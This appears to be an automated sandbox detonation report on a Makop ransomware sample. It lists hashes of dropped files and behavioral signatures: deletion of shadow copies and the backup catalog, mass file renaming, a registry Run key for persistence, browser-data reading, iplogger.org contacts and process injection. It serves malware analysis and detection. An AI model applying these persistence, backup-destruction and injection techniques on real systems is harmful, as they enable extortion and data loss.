SHA256 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512 feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI42602\base_library.zip

MD5 a70f10b994f5b2e03777b4d355eef788
SHA1 141be3cef837cf6120f71c714259d9799586b483
SHA256 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI42602\select.pyd

MD5 fb4a0d7abaeaa76676846ad0f08fefa5
SHA1 755fd998215511506edd2c5c52807b46ca9393b2
SHA256 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512 f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ssl.pyd

MD5 5a393bb4f3ae499541356e57a766eb6a
SHA1 908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256 b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI42602\libssl-1_1.dll

MD5 bc778f33480148efa5d62b2ec85aaa7d
SHA1 b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_tkinter.pyd

MD5 09f66528018ffef916899845d6632307
SHA1 cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512 ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_lzma.pyd

MD5 5fbb728a3b3abbdd830033586183a206
SHA1 066fde2fa80485c4f22e0552a4d433584d672a54
SHA256 f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b
SHA512 31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb

C:\Users\Admin\AppData\Local\Temp\_MEI42602\unicodedata.pyd

MD5 4d3d8e16e98558ff9dac8fc7061e2759
SHA1 c918ab67b580f955b6361f9900930da38cec7c91
SHA256 016d962782beae0ea8417a17e67956b27610f4565cff71dd35a6e52ab187c095
SHA512 0dfabfad969da806bc9c6c664cdf31647d89951832ff7e4e5eeed81f1de9263ed71bddeff76ebb8e47d6248ad4f832cb8ad456f11e401c3481674bd60283991a

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd

MD5 22d65fdceebad51d277a2d8db999b237
SHA1 f65ed91b8bab5c2766f4aeaa86580de0017770ad
SHA256 3a4a5aaaa9a80180601376412180b024dbd43c1a3c313dc408dcdd5ee208cd6a
SHA512 d574e7ba77d4bcea014742678608ce46b51b585a6cc8b6e2a2c064b426042c769083f5a74cebe00800283e6efc8f7b079ef0720c2a7bf51098b5f51978419dc9

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd

MD5 f79a4c8843675e13fc0d4f057faec76a
SHA1 80f8d466d2a42a3b278db0f6edb7e60c2f5afa26
SHA256 e4f57da1c2ae72d2ab4980a2ffa370ac0cf1f3f8c76273dcea3c28fd5c858c1e
SHA512 7955edd12c426599c5103fc71d4fa051092584e5bf6755beee5bbb76977927093ec6b73eaec0276de6e3e28e4f3e1ca0507d1b4a85eeba14f2e5b6032401715d

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd

MD5 2b6eac8d1d5cd08279f4c711f84e3953
SHA1 c1b44d08dcf6fe7f50a1707d91f606b70538ce62
SHA256 a05ffcf7b30d87021f67dc94324f4e7e0481809b07f59cbc77b6798aeb319e7b
SHA512 827215a6894c20e9dde798a660ba49f5810d48d50f75cbbe88607254dbd5bad9518c612f1a06fdd932e3836e928ef9f04df7ce4800614e09ca74fffc0070b86d

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_MD5.cp37-win_amd64.pyd

MD5 9172a2fc5c66fff01f12676d16d8e882
SHA1 ee71eafd922f0ee24f1559c63dd8c82b16dbba00
SHA256 1143956ef572524ca0a4db6e55b918d7e3e137fa87d15df31ae4f8a4d5c6334b
SHA512 8a70a90edbac647d04444e5c926d7619d200632192e978fb56f9597583d3cd4ed8dcb5a0db89f0d3f89a41157388d51a3ab3eca7bc19d37da6917ca954ee0741

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA256.cp37-win_amd64.pyd

MD5 fd2bab04dcf785080fd7e6aa1abdb566
SHA1 9eece186b95a4a6ffa8fadca283ebd2e1f60a340
SHA256 a660650ba2a0914d510d931458bf93a2e2479cf5922bd830f55ff74deebb19c9
SHA512 5ba2a7e097506c18c5ac74c0adac276b137b04185286fc7f2151dc7e7628c044a99d062b123c56dcf2d409dea1b9a5624a08899f5b7735a233f465317e8cfac5

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA1.cp37-win_amd64.pyd

MD5 609daa8ccbefeda1291d663235c257eb
SHA1 3a7232f1f6c6b1c03963316c45b7ae335fd9ede6
SHA256 28cca9038d7f709a8cc251cc664195c68f65d61832547459fb8b3021044fe6da
SHA512 028a198e5c8b2f2f7bf8df716a06b5ffae0a875a9ac4d42c1bc64e4232e1d0700f79a01485a87c8fa7515e7c458912ef89487f4aea77fd769bd32e02ce3b1c64

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Util\_strxor.cp37-win_amd64.pyd

MD5 7d2ed7ed7b5f765f13123a905abdd190
SHA1 6c99d801d39c13f86352762d3c150f0c4ff2918b
SHA256 0dcbf6c5d564b77d40cc71096769ab89092b946dd8ebde2a0effb0c28b36ef3a
SHA512 9d5f307ae558ba62abc2b44b8dd3205a7a7c7524253662ba6f427288695aa41e02ac28785ab77b95a0961bff8b5860fd5b20b54438b280bf9f6cb2523dcedac6

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd

MD5 d02012848d57be3b3967d379ea42426e
SHA1 69610f7f1f35830639cdcf74f99a20be5bb011c7
SHA256 cc1782f000f855b66ff94ddbb34dae3aa520c3fbb98b972c5561f2745791849d
SHA512 51f2dbc9f74b9190fa1f395cac5e8e1b60ac3181da169477e7510411700d42bdcf426285cce8a09983eaa84597621c892d5dc360c56231031e2fc702cddd1be1

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd

MD5 00afcb334aa9cbc635ffb7864d487bca
SHA1 9b0c29dc4c01984ef63d2b868b7d27637aeabde2
SHA256 69e5945cde019e9dcdc23404e81fcc7dd2313eebf259daa3a5af537eaf418267
SHA512 ef1b73b5906713f9b90afc41c60a29d45a1630a6ab1c22be1cc7aa72dc5db7b7bc90dfce1eefda9167a98e911952f7232c5c0f1c4e043428d292cf64fbae284b

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd

MD5 b768eda0fa972c9cd34cebc1e7c4b54e
SHA1 95967222a6902226e9bc94bc1503c1638fbcc7cc
SHA256 4e872e1aa9229a3e95a970af1b6a71c17c5ab84e53a57012c5c7c4412fafeb3f
SHA512 fcf4de7f5be68bb029cd5f6a6413ce3fc1db0ea3d58152b766f86ae1c81653ac9c1b303b8622bb2a34b254f1b9f33e8422b42642992936512d80f435e5229690

C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd

MD5 ea90e3f80b3f3d089e20514e52cae4bb
SHA1 2bd4a5e1b0871ef7ca753b635101216422260eee
SHA256 256f905da0b889b74dcc0ed69a090f26b92e82936e1b149ed1c6d413b45eff96
SHA512 8a8715842b1773386aa75a4eb7136cb8c43da3330e54eddf952469e165c59fe8ce3ed439db6b89e24d1640cec3c64ca2bb3d673727d6a90e9cbd161602d7692c

C:\Users\Admin\AppData\Local\Temp\_MEI42602\certifi\cacert.pem

MD5 1ba3b44f73a6b25711063ea5232f4883
SHA1 1b1a84804f896b7085924f8bf0431721f3b5bdbe
SHA256 bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197
SHA512 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_cpyHook.cp37-win_amd64.pyd

MD5 3271deb52590ba75eadbd732e859ea51
SHA1 a001ed3664f9fb87a6b52411438157f4619f50fd
SHA256 dc80b2f6122ff5f6b8bb37068f602809e9d4e54eaed70b6ae5b22901c83b3993
SHA512 472d9dc42cceb0c569b8f40c3a9d5844dd131bad02e206f7f4fbdc48c6c109f770bd3a69af6d37482d2cea1a23bad58b1c1642caf905df056668127dc1c2adf8

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_bz2.pyd

MD5 cf77513525fc652bad6c7f85e192e94b
SHA1 23ec3bb9cdc356500ec192cac16906864d5e9a81
SHA256 8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41
SHA512 dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_queue.pyd

MD5 c0a70188685e44e73576e3cd63fc1f68
SHA1 36f88ca5c1dda929b932d656368515e851aeb175
SHA256 e499824d58570c3130ba8ef1ac2d503e71f916c634b2708cc22e95c223f83d0a
SHA512 b9168bf1b98da4a9dfd7b1b040e1214fd69e8dfc2019774890291703ab48075c791cc27af5d735220bd25c47643f098820563dc537748471765aff164b00a4aa

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\init.tcl

MD5 b900811a252be90c693e5e7ae365869d
SHA1 345752c46f7e8e67dadef7f6fd514bed4b708fc5
SHA256 bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a
SHA512 36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tk86t.dll

MD5 fdc8a5d96f9576bd70aa1cadc2f21748
SHA1 bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl86t.dll

MD5 c0b23815701dbae2a359cb8adb9ae730
SHA1 5be6736b645ed12e97b9462b77e5a43482673d90
SHA256 f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512 ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_hashlib.pyd

MD5 b32cb9615a9bada55e8f20dcea2fbf48
SHA1 a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256 ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI42602\libcrypto-1_1.dll

MD5 cc4cbf715966cdcad95a1e6c95592b3d
SHA1 d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI42602\pywintypes37.dll

MD5 77b6875977e77c4619bbb471d5eaf790
SHA1 f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI42602\_socket.pyd

MD5 8ea18d0eeae9044c278d2ea7a1dbae36
SHA1 de210842da8cb1cb14318789575d65117d14e728
SHA256 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512 d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

memory/1104-1095-0x00007FFDCB1A3000-0x00007FFDCB1A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoyjlypg.4tt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1104-1105-0x00000218D01A0000-0x00000218D01C2000-memory.dmp

memory/1104-1106-0x00000218D23F0000-0x00000218D2434000-memory.dmp

memory/1104-1107-0x00000218D2440000-0x00000218D24B6000-memory.dmp

memory/1104-1108-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

memory/1104-1109-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

memory/1104-1112-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp

C:\Recovery\decrypt_file.TxT

MD5 2772699925346e374b9a2031385cf42f
SHA1 dac85ee34a2b0e65623bbd572648ba73e5995fc6
SHA256 a5fa6416005be0c9de0e09faea13d40994292776c1036776282993dc6fb7bcf9
SHA512 081121b2aaf12e0f10b23b3d1423bfdf7ff36bdea199630852723c1aa25468390e73232fa56dd05a3bf6ed166bf695b0ac2ce03e33d0d0a3fc1b24c2d6e9ddfd

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:13

Platform

win7-20240704-en

Max time kernel

1798s

Max time network

1565s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Makop

ransomware makop

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8801) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2080 set thread context of 2812 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1800 set thread context of 2524 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2756 set thread context of 1260 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1968 set thread context of 1004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1772 set thread context of 2032 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1704 set thread context of 528 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 set thread context of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 set thread context of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 set thread context of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 set thread context of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1392 set thread context of 2224 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3028 set thread context of 2988 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1504 set thread context of 1808 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1732 set thread context of 2616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2324 set thread context of 1960 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1744 set thread context of 2200 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1860 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3040 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1196 set thread context of 2368 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1680 set thread context of 980 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1840 set thread context of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2040 set thread context of 2152 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1104 set thread context of 2724 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 3064 set thread context of 1496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1052 set thread context of 1632 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
